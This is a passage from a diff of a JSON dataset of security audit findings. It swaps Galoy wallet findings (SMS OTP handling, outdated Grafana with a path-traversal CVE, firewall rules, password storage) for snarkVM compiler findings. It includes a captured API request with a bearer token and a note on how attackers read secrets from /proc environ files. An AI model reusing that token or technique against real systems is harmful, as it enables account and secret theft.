vulnerability in a third-party application could lead to the compromise and disclosure of the text messages on the device, including Galoys SMS OTP messages. Another common technique used to target mobile nance applications is the interception of notications on a device. Android operating systems, for instance, broadcast notications across applications by design; a rogue application could subscribe to those notications to access incoming text message notications. Attackers also target SMS-based two-factor authentication and OTP implementations through SIM swapping . In short, an attacker uses social engineering to gather information about the owner of a SIM card and then, impersonating its owner, requests a new SIM card from the telecom company. All calls and text messages will then be sent to the attacker, leaving the original owner of the number out of the loop. This approach has been used in many recent attacks against crypto wallet owners, leading to millions of dollars in losses. Recommendations Short term, avoid using SMS authentication as anything other than an optional way to validate an account holder's identity and prole information. Instead of SMS-based OTP, provide support for hardware-based two-factor authentication methods such as Yubikey tokens, or software-based time-based one-time password (TOTP) implementations such as Google Authenticator and Authy. References What is a Sim Swap? Denition and Related FAQs, Yubico", + "title": "18. Commit and hash instructions not matched against the opcode in check_instruction_opcode ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The check_instruction_opcode function validates that the opcode and instructions match for the Literal , Call , and Cast opcodes, but not for the Commit and Hash opcodes. Although there is partial code for this validation, it is commented out: Opcode::Commit(opcode) => { // Ensure the instruction belongs to the defined set. if ![ \"commit.bhp256\" , \"commit.bhp512\" , \"commit.bhp768\" , \"commit.bhp1024\" , \"commit.ped64\" , \"commit.ped128\" , ] .contains(&opcode) { bail!( \"Instruction '{instruction}' is not the opcode '{opcode}'.\" ); } // Ensure the instruction is the correct one. // match opcode { // \"commit.bhp256\" => ensure!( // matches!(instruction, Instruction::CommitBHP256(..)), // \"Instruction '{instruction}' is not the opcode '{opcode}'.\" // ), // } } Opcode::Hash(opcode) => { // Ensure the instruction belongs to the defined set. if ![ \"hash.bhp256\" , \"hash.bhp512\" , \"hash.bhp768\" , \"hash.bhp1024\" , \"hash.ped64\" , \"hash.ped128\" , \"hash.psd2\" , \"hash.psd4\" , \"hash.psd8\" , ] .contains(&opcode) { bail!( \"Instruction '{instruction}' is not the opcode '{opcode}'.\" ); } // Ensure the instruction is the correct one. // match opcode { // \"hash.bhp256\" => ensure!( // matches!(instruction, Instruction::HashBHP256(..)), // \"Instruction '{instruction}' is not the opcode '{opcode}'.\" // ), // } } Figure 18.1: vm/compiler/src/process/stack/helpers/insert.rs Recommendations Short term, add checks to validate that the opcode and instructions match for the Commit and Hash opcodes.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "10. Incorrect handling and implementation of SMS OTPs ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "Users authenticate to the web panel by providing OTPs sent to them over SMS. We identied two issues in the OTP authentication implementation: 1. The generated OTPs are persistent because OTP expiration dates are calculated incorrectly. The Date.now() method returns the epoch time in milliseconds, whereas it is meant to return the time in seconds. 294 const PhoneCodeSchema = new Schema({ 295 created_at: { 296 297 type : Date , default: Date.now , 298 required: true , Figure 10.1: The default date value is expressed in milliseconds. ( src/services/mongoose/schema.ts#294298 ) 11 export const VALIDITY_TIME_CODE = ( 20 * 60 ) as Seconds Figure 10.2: The default validity period is expressed in seconds. ( src/config/index.ts#11 ) 49 50 51 const age = VALIDITY_TIME_CODE const validCode = await isCodeValid({ phone: phoneNumberValid , code, age }) if (validCode instanceof Error ) return validCode Figure 10.3: Validation of an OTPs age ( src/app/users/login.ts#4951 ) 18 }): Promise < true | RepositoryError> => { 19 20 21 const timestamp = Date .now() / 1000 - age try { const phoneCode = await PhoneCode.findOne({ 22 phone, 23 code, 24 created_at: { 25 $gte: timestamp , 26 }, Figure 10.4: The codebase validates the timestamp in seconds, while the default date is in milliseconds, as shown in gure 10.1. ( src/services/mongoose/phone-code.ts#1826 ) 2. The SMS OTPs are never discarded. When a new OTP is sent to a user, the old one remains valid regardless of its expiration time. A users existing OTP tokens also remain valid if the user manually logs out of a session, which should not be the case. Tests of the admin-panel and web-wallet code conrmed that all SMS OTPs generated for a given phone number remain valid in these cases. Exploit Scenario After executing a successful phishing attack against a user, an attacker is able to intercept an OTP sent to that user, gaining persistent access to the victim's account. The attacker will be able to use the code even when the victim logs out of the session or requests a new OTP. Recommendations Short term, limit the lifetime of OTPs to two minutes. Additionally, immediately invalidate an OTP, even an unexpired one, when any of the following events occur: The user logs out of a session The user requests a new OTP The OTP is used successfully The OTP reaches its expiration time The users account is locked for any reason (e.g., too many login attempts) References NIST best practices for implementing authentication tokens", + "title": "19. Incorrect validation of the number of operands ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The implementation of Literals::fmt and Literals::write_le do not correctly validate the number of operands in the operation. Instead of enforcing the exact number of arguments, the implementations only ensure that the number of operands is less than or equal to the expected number of operands: /// Writes the operation to a buffer. fn write_le (& self , mut writer: W ) -> IoResult <()> { // Ensure the number of operands is within the bounds. if NUM_OPERANDS > N::MAX_OPERANDS { return Err (error( format! ( \"The number of operands must be <= {}\" , N::MAX_OPERANDS))); } // Ensure the number of operands is correct. if self .operands.len() > NUM_OPERANDS { return Err (error( format! ( \"The number of operands must be {}\" , NUM_OPERANDS))); } Figure 19.1: vm/compiler/src/program/instruction/operation/literals.rs#L294-L303 Recommendations Short term, replace the if statement guard with self.operands.len() != NUM_OPERANDS in both the Literals::fmt and Literals::write_le functions.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "11. Vulnerable and outdated Node packages ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "We used the yarn audit and snyk tools to audit the project dependencies and components for known vulnerabilities and outdated versions, respectively. The project uses many outdated packages with known security vulnerabilities ranging from critical to low severity. A list of vulnerable and outdated packages is included in appendix C . Vulnerabilities in packages imported by an application are not necessarily exploitable. In most cases, an aected method in a vulnerable package needs to be used in the right context to be exploitable. We manually reviewed the packages with high- or critical-severity vulnerabilities and did not nd any vulnerabilities that could be exploited in the Galoy application. However, that could change as the code is further developed. Exploit Scenario An attacker ngerprints one of Galoys components, identies an out-of-date package with a known vulnerability, and uses it in an exploit against the component. Recommendations Short term, update the outdated and vulnerable dependencies. Long term, integrate static analysis tools that can detect outdated and vulnerable libraries (such as the yarn audit and snyk tools) into the build and / or test pipeline. This will improve the system's security posture and help prevent the exploitation of project dependencies.", + "title": "20. Inconsistent and random compiler error message ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "When the compiler nds a type mismatch between arguments and expected parameters, it emits an error message containing a dierent integer each time the code is compiled. Figure 20.1 shows an Aleo program that, when compiled twice, shows two dierent error messages (shown in gure 20.2). The error message also states that u8 is invalid, but at the same time expecting u8 . program main.aleo; closure clo: input r0 as i8; input r1 as u8; pow r0 r1 into r2; output r2 as i8; function compute: input r0 as i8.private; input r1 as i8.public; call clo r0 r1 into r2; // r1 is i8 but the closure requires u8 output r2 as i8.private; Figure 20.1: Aleo program ~/Documents/aleo/foo (testnet3?) $ aleo build Compiling 'main.aleo'... Loaded universal setup (in 1537 ms) 'u8' is invalid : expected u8, found 124i8 ~/Documents/aleo/foo (testnet3?) $ aleo build Compiling 'main.aleo'... Loaded universal setup (in 1487 ms) 'u8' is invalid : expected u8, found -39i8 Figure 20.2: Two compilation results Figure 20.3 shows the check that validates that the types match and shows the error message containing the actual literal instead of literal.to_type() : Plaintext::Literal(literal, ..) => { // Ensure the literal type matches. match literal.to_type() == *literal_type { true => Ok (()), false => bail!( \"'{ plaintext_type }' is invalid: expected {literal_type}, found { literal }\" ), Figure 20.3: vm/compiler/src/process/stack/helpers/matches.rs#L204-L209 Recommendations Short term, clarify the error message by rephrasing it and presenting only the literal type instead of the full literal.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -3902,149 +6610,139 @@ ] }, { - "title": "12. Outdated and internet-exposed Grafana instance ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The Grafana admin panel is exposed over the internet. A management interface should not be exposed over the internet unless it is protected by a secondary authentication or access control mechanism; these mechanisms (e.g., IP address restrictions and VPN solutions) can mitigate the immediate risk to an application if it experiences a vulnerability. Moreover, the Grafana version deployed at grafana.freecorn.galoy.io is outdated and vulnerable to known security issues. Figure 12.1: The outdated Grafana version (8.2.1) with known security issues The version banner on the login page (gure 12.1) identies the version as v8.2.1 ( 88622d7f09 ). This version has multiple moderate- and high-risk vulnerabilities. One of them, a path traversal vulnerability ( CVE-2021-43798 ), could enable an unauthenticated attacker to read the contents of arbitrary les on the server. However, we could not exploit this issue, and the Galoy team suggested that the code might have been patched through an upstream software deployment. Time constraints prevented us from reviewing all Grafana instances for potential vulnerabilities. We reviewed only the grafana.freecorn.galoy.io instance, but the recommendations in this nding apply to all deployed instances. Exploit Scenario An attacker identies the name of a valid plugin installed and active on the instance. By using a specially crafted URL, the attacker can read the contents of any le on the server (as long as the Grafana process has permission to access the le). This enables the attacker to read sensitive conguration les and to engage in remote command execution on the server. Recommendations Short term, avoid exposing any Grafana instance over the internet, and restrict access to each instances management interface. This will make the remote exploitation of any issues much more challenging. Long term, to avoid known security issues, review all deployed instances and ensure that they have been updated to the latest version. Additionally, review the Grafana log les for any indication of the attack described in CVE-2021-43798, which has been exploited in the wild. References List of publicly known vulnerabilities aecting recent versions of Grafana", + "title": "21. Instruction add_* methods incorrectly compare maximum number of allowed instructions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "During function and closure parsing, the compiler collects input, regular, and output instructions into three dierent IndexSet s in the add_input , add_instruction , and add_output functions. All of these functions check that the current number of elements in their respective IndexSet does not exceed the maximum allowed number. However, the check is done before inserting the element in the set, allowing inserting in a set that is already at full capacity and creating a set with one element more than the maximum. Figure 21.1 shows the comparison between the current and the maximum number of allowed elements and the subsequent insertion, which is allowed even though the set could already be at full capacity. All add_input , add_instruction , and add_output functions for both the Function and Closure types present similar behavior. Note that although the number of input and output instructions is checked in other locations (e.g., on the add_closure or get_closure functions), the number of regular instructions is not checked there, allowing a function or a closure with 1 + N::MAX_INSTRUCTIONS . fn add_output (& mut self , output: Output ) -> Result <()> { // Ensure there are input statements and instructions in memory. ensure!(! self .inputs.is_empty(), \"Cannot add outputs before inputs have been added\" ); ensure!(! self .instructions.is_empty(), \"Cannot add outputs before instructions have been added\" ); // Ensure the maximum number of outputs has not been exceeded. ensure!( self .outputs.len() <= N::MAX_OUTPUTS , \"Cannot add more than {} outputs\" , N::MAX_OUTPUTS); // Insert the output statement. self .outputs.insert(output); Ok (()) } Figure 21.1: vm/compiler/src/program/function/mod.rs#L142-L153 Figure 21.1 shows another issue present only in the add_output functions (for both Function and Closure types): When an output instruction is inserted into the set, no check validates if this particular element is already in the set, replacing the previous element with the same key if present. This causes two output statements to be interpreted as a single one: program main.aleo; closure clo: input r0 as i8; input r1 as u8; pow r0 r1 into r2; output r2 as i8; output r2 as i8; function compute: input r0 as i8.private; input r1 as u8.public; call clo r0 r1 into r2 ; output r2 as i8.private; Figure 21.2: Test program Recommendations Short term, we recommend the following actions: Modify the checks to validate the maximum number of allowed instructions to prevent the o-by-one error. Validate if outputs are already present in the Function and Closure sets before inserting an output. Add checks to validate the maximum number of instructions in the get_closure , get_function , add_closure , and add_function functions.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Low", + "Difficulty: High" ] }, { - "title": "13. Incorrect processing of GET path parameter ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "If the value of the hidden path parameter in the GET request in gure 13.1 does not match the value in the appRoutesDef array, the request will cause an unhandled error (gure 13.2). The error occurs when the result of the serverRenderer function is undefined (line 21, gure 13.3), because the Invalid route path error is thrown in the call to the renderToStringWithData function (gure 13.4). GET / ?path=aaaa HTTP / 1.1 Host: localhost:3000 Figure 13.1: The HTTP request that triggers the error HTTP / 1.1 500 Internal Server Error // (...) ReferenceError: /Users/md/work/web-wallet/views/index.ejs:8 6| 7| >> 8| <%- pageData.title %> 9| 10| /colors.css\" /> 11| \" /> pageData is not defined at eval (\"web-wallet/views/index.ejs\":12:17) at index (web-wallet/node_modules/ejs/lib/ejs.js:692:17) at tryHandleCache (web-wallet/node_modules/ejs/lib/ejs.js:272:36) at View.exports.renderFile [as engine] (web-wallet/node_modules/ejs/lib/ejs.js:489:10) at View.render (web-wallet/node_modules/express/lib/view.js:135:8) at tryRender (web-wallet/node_modules/express/lib/application.js:640:10) at Function.render (web-wallet/node_modules/express/lib/application.js:592:3) at ServerResponse.render (web-wallet/node_modules/express/lib/response.js:1017:7) at web-wallet/src/server/ssr-router.ts:24:18 Figure 13.2: The HTTP response that shows the unhandled error 21 22 23 24 const vars = await serverRenderer(req)({ // undefined path: checkedRoutePath , }) return res.render( \"index\" , vars) // call when the vars is undefined Figure 13.3: src/server/ssr-router.ts#2124 10 export const serverRenderer = 11 (req: Request ) => 12 async ({ 13 path, 14 flowData, 15 }: { 16 path: RoutePath | AuthRoutePath 17 flowData?: KratosFlowData 18 }) => { 19 try { // (...) 43 const initialMarkup = await renderToStringWithData(App) // (...) 79 }) 80 } catch (err) { 81 console.error(err) 82 } Figure 13.4: src/renderers/server.tsx#1082 Exploit Scenario An attacker nds a way to inject malicious code into the hidden path parameter. This results in an open redirect vulnerability, enabling the attacker to redirect a victim to a malicious website. Recommendations Short term, ensure that errors caused by an invalid path parameter value (one not included in the appRoutesDef whitelist) are handled correctly. A path parameter should not be processed if it is unused. Long term, use Burp Suite Professional with the Param Miner extension to scan the application for hidden parameters.", + "title": "22. Instances of unchecked zip_eq can cause runtime errors ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The zip_eq operator requires that both iterators being zipped have the same length, and panics if they do not. In addition to the cases presented in TOB-ALEOA-5 , we found one more instance where this should be checked: // Retrieve the interface and ensure it is defined in the program. let interface = stack.program().get_interface(&interface_name)?; // Initialize the interface members. let mut members = IndexMap::new(); for (member, (member_name, member_type)) in inputs.iter(). zip_eq (interface.members()) { Figure 22.1: compiler/src/program/instruction/operation/cast.rs#L92-L99 Additionally, we found uses of the zip operator that should be replaced by zip_eq , together with an associated check to validate the equal length of their iterators: /// Checks that the given operands matches the layout of the interface. The ordering of the operands matters. pub fn matches_interface (& self , stack: & Stack , operands: & [Operand], interface: & Interface ) -> Result <()> { // Ensure the operands is not empty. if operands.is_empty() { bail!( \"Casting to an interface requires at least one operand\" ) } // Ensure the operand types match the interface. for (operand, (_, member_type)) in operands.iter(). zip (interface.members()) { Figure 22.2: vm/compiler/src/process/register_types/matches.rs#L20-L27 for (operand, (_, entry_type)) in operands.iter().skip( 2 ). zip (record_type.entries()) { Figure 22.3: vm/compiler/src/process/register_types/matches.rs#L106-L107 Exploit Scenario An incorrectly typed program causes the compiler to panic due to a mismatch between the number of arguments in a cast and the number of elements in the casted type. Recommendations Short term, add checks to validate the equal length of the iterators being zipped and replace the uses of zip with zip_eq together with the associated length validations.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Undetermined" + "Severity: Informational", + "Difficulty: Low" ] }, { - "title": "14. Discrepancies in API and GUI access controls ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "Although the Web Wallets graphical user interface (GUI) does not allow changes to a username (gure 14.1), they can be made through the GraphQL userUpdateUsername mutation (gure 14.2). Figure 14.1: The lock icon on the Settings page indicates that it is not possible to change a username. POST /graphql HTTP / 2 Host: api.freecorn.galoy.io Content-Length: 345 Content-Type: application/json Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiI2MjI3ODYwMWJlOGViYWYxZWRmNDBhNDYiLCJ uZXR3b3JrIjoibWFpbm5ldCIsImlhdCI6MTY0Njc1NzU4NX0.ed2dk9gMQh5DJXCPpitj5wq78n0gFnmulRp 2KIXTVX0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Origin: https://wallet.freecorn.galoy.io { \"operationName\" : \"userUpdateUsername\" , \"variables\" :{ \"input\" :{ \"username\" : \"aaaaaaaaaaaa aaa\" }}, \"query\" : \" mutation userUpdateUsername($input: UserUpdateUsernameInput!) {\\n userUpdateUsername(input: $input) {\\n errors {\\n message\\n __typename\\n }\\n user {\\n id\\n username\\n __typename\\n }\\n __typename\\n }\\n} \" } HTTP/ 2 200 OK // (...) { \"data\" :{ \"userUpdateUsername\" :{ \"errors\" :[], \"user\" :{ \"id\" : \"04f01fb4-6328-5982-a39a-eeb 027a2ceef\" , \"username\" : \"aaaaaaaaaaaaaaa\" , \"__typename\" : \"User\" }, \"__typename\" : \"UserUpdat eUsernamePayload\" }}} Figure 14.2: The HTTP request-response cycle that enables username changes Exploit Scenario An attacker nds a discrepancy in the access controls of the GUI and API and is then able to use a sensitive method that the attacker should not be able to access. Recommendations Short term, avoid relying on client-side access controls. If the business logic of a functionality needs to be blocked, the block should be enforced in the server-side code. Long term, create an access control matrix for specic roles in the application and implement unit tests to ensure that appropriate access controls are enforced server-side.", + "title": "23. Hash functions lack domain separation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The BHP hash function takes as input a collection of booleans, and hashes them. This hash is used to commit to a Record , hashing together the bits of program_id , the record_name , and the record itself. However, no domain separation or input length is added to the hash, allowing a hash collision if a types to_bits_le function returns variable-length arrays: impl Record> { /// Returns the record commitment. pub fn to_commitment (& self , program_id: & ProgramID , record_name: & Identifier ) -> Result > { // Construct the input as `(program_id || record_name || record)`. let mut input = program_id.to_bits_le(); input.extend(record_name.to_bits_le()); input.extend( self .to_bits_le()); // Compute the BHP hash of the program record. N::hash_bhp1024(&input) } } Figure 23.1: console/program/src/data/record/to_commitment.rs#L19-L29 A similar situation is present on the hash_children function, which is used to compute hashes of two nodes in a Merkle tree: impl PathHash for BHP { type Hash = Field; /// Returns the hash of the given child nodes. fn hash_children (& self , left: & Self ::Hash, right: & Self ::Hash) -> Result < Self ::Hash> { // Prepend the nodes with a `true` bit. let mut input = vec! [ true ]; input.extend(left.to_bits_le()); input.extend(right.to_bits_le()); // Hash the input. Hash::hash( self , &input) } } Figure 23.2: circuit/collections/src/merkle_tree/helpers/path_hash.rs#L33-L47 If the implementations of the to_bits_le functions return variable length arrays, it would be easy to create two dierent inputs that would result in the same hash. Recommendations Short term, either enforce each types to_bits_le function to always be xed length or add the input length and domain separators to the elements to be hashed by the BHP hash function. This would prevent the hash collisions even if the to_bits_le functions were changed in the future.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Low" + "Severity: Medium", + "Difficulty: Medium" ] }, { - "title": "15. Cloud SQL does not require TLS connections ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "Terraforms declarative conguration le for the Cloud SQL instance does not indicate that PostgreSQL should enforce the use of Transport Layer Security (TLS) connections. Similarly, the Galoy solution does not use the Cloud SQL Auth proxy, which provides strong encryption and authentication using identity and access management. Because the database is exposed only in a virtual private cloud (VPC) network, this nding is of low severity. Exploit Scenario An attacker manages to eavesdrop on trac in the VPC network. If one of the database clients is miscongured, the attacker will be able to observe the database trac in plaintext. Recommendations Short term, congure Cloud SQL to require the use of TLS, or use the Cloud SQL Auth proxy. Long term, integrate Terrascan or another automated analysis tool into the workow to detect areas of improvement in the solution. References Congure SSL/TLS certicates , Cloud SQL documentation Connect from Google Kubernetes Engine , Cloud SQL documentation", + "title": "24. Deployment constructor does not enforce the network edition value ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The Deployment type includes the edition value, which should match the network edition value. However, this is not enforced in the deployment constructor as it is in the Execution constructor. impl Deployment { /// Initializes a new deployment. pub fn new ( edition: u16 , program: Program , verifying_keys: IndexMap , (VerifyingKey, Certificate)>, ) -> Result < Self > { Ok ( Self { edition, program, verifying_keys }) } } Figure 24.1: vm/compiler/src/process/deployment/mod.rs#L37-L44 Recommendations Short term, consider using the N::EDITION value in the Deployment constructor, similarly to the Execution constructor.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, { - "title": "16. Kubernetes node pools are not congured to auto-upgrade ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The Galoy application uses Google Kubernetes Engine (GKE) node pools in which the auto-upgrade functionality is disabled. The auto-upgrade functionality helps keep the nodes in a Kubernetes cluster up to date with the Kubernetes version running on the cluster control plane, which Google updates on the users behalf. Auto-upgrades also ensure that security updates are timely applied. Disabling this setting is not recommended by Google and could create a security risk if patching is not performed manually. 124 125 126 management { auto_repair = true auto_upgrade = false 127 } Figure 16.1: The auto-upgrade property is set to false . ( modules/platform/gcp/kube.tf#124127 ) Recommendations Short term, enable the auto-upgrade functionality to ensure that the nodes are kept up to date and that security patches are timely applied. Long term, remain up to date on the security features oered by Google Cloud. Integrate Terrascan or another automated tool into the development workow to detect areas of improvement in the solution. References Auto-upgrading nodes , GKE documentation", + "title": "25. Map insertion return value is ignored ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "Some insertions into hashmap data types ignore whether the insertion overwrote an element already present in the hash map. For example, when handling the proving and verifying key index maps, the Optional return value from the insert function is ignored: #[inline] pub fn insert_proving_key (& self , function_name: & Identifier , proving_key: ProvingKey ) { self .proving_keys.write().insert(*function_name, proving_key); } /// Inserts the given verifying key for the given function name. #[inline] pub fn insert_verifying_key (& self , function_name: & Identifier , verifying_key: VerifyingKey ) { self .verifying_keys.write().insert(*function_name, verifying_key); } Figure 25.1: vm/compiler/src/process/stack/mod.rs#L336-L346 Other examples of ignored insertion return values are present in the codebase and can be found using the regular expression \\.insert.*\\); . Recommendations Short term, investigate if any of the unguarded map insertions should be checked.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Undetermined" + "Difficulty: Low" ] }, { - "title": "17. Overly permissive rewall rules ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The VPC rewall conguration is overly permissive. This conguration, in conjunction with Google Clouds default VPC rules, allows most communication between pods (gure 17.2), the bastion host (gure 17.3), and the public internet (gure 17.1). 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 resource \"google_compute_firewall\" \"bastion_allow_all_inbound\" { project = local.project name = \"${local.name_prefix}-bastion-allow-ingress\" network = google_compute_network.vpc.self_link target_tags = [ local.tag ] direction = \"INGRESS\" source_ranges = [ \"0.0.0.0/0\" ] priority = \"1000\" allow { protocol = \"all\" } 107 } Figure 17.1: The bastion ingress rules allow incoming trac on all protocols and ports from all addresses. ( modules/inception/gcp/bastion.tf#92107 ) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 resource \"google_compute_firewall\" \"intra_egress\" { project = local.project name = \"${local.name_prefix}-intra-cluster-egress\" description = \"Allow pods to communicate with each other and the master\" network = data.google_compute_network.vpc.self_link priority = 1000 direction = \"EGRESS\" target_tags = [ local.cluster_name ] destination_ranges = [ local.master_ipv4_cidr_block , google_compute_subnetwork.cluster.ip_cidr_range , google_compute_subnetwork.cluster.secondary_ip_range[0].ip_cidr_range , ] # Allow all possible protocols allow { protocol = \"tcp\" } allow { protocol = \"udp\" } allow { protocol = \"icmp\" } allow { protocol = \"sctp\" } allow { protocol = \"esp\" } allow { protocol = \"ah\" } 23 } Figure 17.2: Pods can initiate connections to other pods on all protocols and ports. ( modules/platform/gcp/firewall.tf#123 ) 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 resource \"google_compute_firewall\" \"dmz_nodes_ingress\" { name = \"${var.name_prefix}-bastion-nodes-ingress\" description = \"Allow ${var.name_prefix}-bastion to reach nodes\" project = local.project network = data.google_compute_network.vpc.self_link priority = 1000 direction = \"INGRESS\" target_tags = [ local.cluster_name ] source_ranges = [ data.google_compute_subnetwork.dmz.ip_cidr_range , ] # Allow all possible protocols allow { protocol = \"tcp\" } allow { protocol = \"udp\" } allow { protocol = \"icmp\" } allow { protocol = \"sctp\" } allow { protocol = \"esp\" } 63 allow { protocol = \"ah\" } 64 } Figure 17.3: The bastion host can initiate connections to pods on all protocols and ports. ( modules/platform/gcp/firewall.tf#4464 ) Exploit Scenario 1 An attacker gains access to a pod through a vulnerability in an application. He takes advantage of the unrestricted egress trac and miscongured pods to launch attacks against other services and pods in the network. Exploit Scenario 2 An attacker discovers a vulnerability on the Secure Shell server running on the bastion host. She exploits the vulnerability to gain network access to the Kubernetes cluster, which she can then use in additional attacks. Recommendations Short term, restrict both egress and ingress trac to necessary protocols and ports. Document the expected network interactions across the components and check them against the implemented rewall rules. Long term, use services such as the Identity-Aware Proxy to avoid exposing hosts directly to the internet, and enable VPC Flow Logs for network monitoring. Additionally, integrate automated analysis tools such as tfsec into the development workow to detect rewall issues early on. References Using IAP for TCP forwarding, Identity-Aware Proxy documentation", + "title": "26. Potential truncation on reading and writing Programs, Deployments, and Executions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "When writing a Program to bytes, the number of import statements and identiers are casted to an u8 integer, leading to the truncation of elements if there are more than 256 identiers: // Write the number of program imports. ( self .imports.len() as u8 ).write_le(& mut writer)?; // Write the program imports. for import in self .imports.values() { import.write_le(& mut writer)?; } // Write the number of components. ( self .identifiers.len() as u8 ).write_le(& mut writer)?; Figure 26.1: vm/compiler/src/program/bytes.rs#L73-L81 During Program parsing, this limit of 256 identiers is never enforced. Similarly, the Execution and Deployment write_le functions assume that there are fewer than u16::MAX transitions and verifying keys, respectively. // Write the number of transitions. ( self .transitions.len() as u16 ).write_le(& mut writer)?; Figure 26.2: vm/compiler/src/process/execution/bytes.rs#L52-L53 // Write the number of entries in the bundle. ( self .verifying_keys.len() as u16 ).write_le(& mut writer)?; Figure 26.3: vm/compiler/src/process/deployment/bytes.rs#L62-L63 Recommendations Short term, determine a maximum number of allowed import statements and identiers and enforce this bound on Program parsing. Then, guarantee that the integer type used in the write_le function includes this bound. Perform the same analysis for the Execution and Deployment functions.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: Low", + "Difficulty: Low" ] }, { - "title": "18. Lack of uniform bucket-level access in Terraform state bucket ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "Uniform bucket-level access is not enabled in the bootstrap module bucket used to store the Terraform state. When enabled, this feature implements a uniform permission system, providing access at the bucket level rather than on a per-object basis. It also simplies the access controls / permissions of a bucket, making them easier to manage and reason about. 1 2 3 4 5 6 7 8 resource \"google_storage_bucket\" \"tf_state\" { name = \"${local.name_prefix}-tf-state\" project = local.project location = local.tf_state_bucket_location versioning { enabled = true } force_destroy = local.tf_state_bucket_force_destroy 9 } Figure 18.1: The bucket denition lacks a uniform_bucket_level_access eld set to true . ( modules/bootstrap/gcp/tf-state-bucket.tf#19 ) Exploit Scenario The permissions of some objects in a bucket are miscongured. An attacker takes advantage of that fact to access the Terraform state. Recommendations Short term, enable uniform bucket-level access in this bucket. Long term, integrate automated analysis tools such as tfsec into the development workow to identify any similar issues and areas of improvement.", + "title": "27. StatePath::verify accepts invalid states ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The StatePath::verify function attempts to validate several properties in the transaction using the code shown in gure 28.1. However, this code does not actually check that all checks are true; it checks only that there are an even number of false booleans. Since there are six booleans in the operation, the function will return true if all are false. // Ensure the block path is valid. let check_block_hash = A::hash_bhp1024(&block_hash_preimage).is_equal(& self .block_hash); // Ensure the state root is correct. let check_state_root = A::verify_merkle_path_bhp(& self .block_path, & self .state_root, & self .block_hash.to_bits_le()); check_transition_path .is_equal(&check_transaction_path) .is_equal(&check_transactions_path) .is_equal(&check_header_path) .is_equal(&check_block_hash) .is_equal(&check_state_root) } Figure 27.1: vm/compiler/src/ledger/state_path/circuit/verify.rs#L57-L70 We marked the severity as informational since the function is still not being used. Exploit Scenario An attacker submits a StatePath where no checks hold, but the verify function still returns true. Recommendations Short term, ensure that all checks are true (e.g., by conjuncting all booleans and checking that the resulting boolean is true).", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Undetermined" + "Difficulty: Low" ] }, { - "title": "19. Insecure storage of passwords ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "Galoy passwords are stored in conguration les and environment variables or passed in as command-line arguments. There are two issues with this method of storage: (1) the default keys are low entropy (gure 19.1) and (2) the fact that there are default keys in the rst place suggests that users deploying components may not realize that they need to set passwords. 53 export BITCOINDRPCPASS=rpcpassword // (...) 68 export MONGODB_PASSWORD=password // (...) 79 export JWT_SECRET= \"jwt_secret\" Figure 19.1: An example conguration le with passwords ( .envrc#5379 ) Passing in sensitive values through environment variables (gure 19.2) increases the risk of a leak for several reasons: Environment variables are often dumped to external services through crash-logging mechanisms. All processes started by a user can read environment variables from the /proc/$pid/environ le. Attackers often use this ability to dump sensitive values passed in through environment variables (though this requires nding an arbitrary le read vulnerability in the application). An application can also overwrite the contents of a special /proc/$pid/environ le. However, overwriting the le is not as simple as calling setenv(SECRET, \"******\") , because runtimes copy environment variables upon initialization and then operate on the copy. To clear environment variables from that special environ le, one must either overwrite the stack data in which they are located or make a low-level prctl system call with the PR_SET_MM_ENV_START and 